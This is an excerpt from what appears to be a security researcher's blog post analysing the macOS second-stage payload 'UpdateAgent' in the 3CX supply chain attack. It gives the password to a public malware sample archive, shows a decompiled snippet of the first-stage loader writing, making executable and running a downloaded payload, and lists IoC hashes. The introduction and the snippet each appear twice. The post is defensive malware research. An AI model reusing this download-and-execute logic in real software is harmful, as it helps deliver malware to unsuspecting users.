Ironing out (the macOS) details of a Smooth Operator (Part II)
Contents
As “Sharing is Caring” I’ve uploaded the malicious binary UpdateAgent to our public macOS malware collection. The password is: infect3d
Earlier this week, I published a blog post that added a missing puzzle piece to the 3CX supply chain attack (attributed to the North Koreans, aka Lazarus Group).
In that post, we uncovered the trojanization component of macOS variant of the attack, comprehensively analyzed it, and provided IoCs for detection. I’d recommend reading that write up, as this post, part II, continues on from were that left off.
We ended the previous post, noting the main goal of the 1st-stage payload (
libffmpeg.dylib) was to download and execute a 2nd-stage payload named
UpdateAgent. The following snippet of annotated decompiled code, from the 1st-stage payload shows this logic:
//write out 2nd-stage payload "UpdateAgent" // which was just downloaded from the attacker's server stream = fopen(path2UpdateAgent, "wb"); fwrite(bytes, length, 0x1, stream); fflush(stream); fclose(stream); //make +x chmod(path2UpdateAgent, 755); //execute …
Earlier this week, I published a blog post that added a missing puzzle piece to the 3CX supply chain attack (attributed to the North Koreans, aka Lazarus Group).
In that post, we uncovered the trojanization component of macOS variant of the attack, comprehensively analyzed it, and provided IoCs for detection. I’d recommend reading that write up, as this post, part II, continues on from were that left off.
We ended the previous post, noting the main goal of the 1st-stage payload (
libffmpeg.dylib) was to download and execute a 2nd-stage payload named
UpdateAgent. The following snippet of annotated decompiled code, from the 1st-stage payload shows this logic:
//write out 2nd-stage payload "UpdateAgent" // which was just downloaded from the attacker's server stream = fopen(path2UpdateAgent, "wb"); fwrite(bytes, length, 0x1, stream); fflush(stream); fclose(stream); //make +x chmod(path2UpdateAgent, 755); //execute …
IoC
55554944839216049d683075bc3f5a8628778bb8
55554944ee2cb96a1f5132ce8788c3fe0dfe7392
9e9a5f8d86356796162cee881c843cde9eaedfb3
55554944ee2cb96a1f5132ce8788c3fe0dfe7392
9e9a5f8d86356796162cee881c843cde9eaedfb3